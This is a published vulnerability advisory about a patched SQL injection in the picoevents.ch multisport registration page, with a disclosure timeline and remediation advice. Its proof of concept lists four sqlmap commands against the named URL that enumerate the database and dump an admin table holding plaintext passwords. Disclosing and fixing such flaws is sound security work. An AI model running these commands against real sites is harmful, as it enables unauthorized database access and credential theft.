entry.picoevents.ch - SQL-Injection Vulnerability (#mvid6)

Document Title:
entry.picoevents.ch - SQL-Injection Vulnerability

mosi Vulnerability ID (mvid):

Discovery Status:
Patched - Public Disclosure

CVSSv2 Overall Score:

CVSSv2 Vector:

Product & Service Introduction:
picoEvents provides an online registration and live result service to simplify the timekeeping in orienteering combined with SPORTident.

Simon Monai found together with Timo Kübler and Namo Flury a SQL-injection vulnerability in the web form. It was abused to delete the competitions stored in the database on the webserver.

Report Timeline:
2017-06-19: Analysis of server attack requested by vendor
2017-06-19: Vulnerability detected
2017-06-19: Vendor informed
2017-06-20: Vendor acknowledge
2017-06-20: Vendor applied workaround
2017-06-21: Patch provided by mosi security research
2017-06-21: Patch faulty
2017-06-26: New patch by mosi security research
2017-06-26: Patch approved by mosi security research
2017-06-27: Public Disclosure

Affected Products:
entry.picoevents.ch - Multisport Registration Page

Exploitation Technique:
SQL Injection

Security Level:

Technical Details & Description:
Request method (s):
[+] GET

Vulnerable Module(s):
[+] http://www.picoevents.ch/entry/multisport/weiche_msp.php?recordID=95

Proof of Concept (PoC):
By running following commands in the shell of a Kali Linux installation, the administration account passwords can be gathered:

sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 --dbs
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS --tables
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --columns
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --dump

The results are alarming. The admin passwords are stored in clear text and allow the hacker to log into the administrator interface and perform changes.

Possible Solution:
Check the GET-vars against SQL injection parameters and hash the passwords. A WAF can help preventing further attacks.

Security Risk:
This vulnerability is rated critical and was already abused. (CVSSv2 9.6)

Author / Credits:
mosi security research - Simon Monai (http://jongliertricks.ch/kontakt)

Public Disclosure:
2017-06-27 - https://jongliertricks.ch/mosi-security-research/40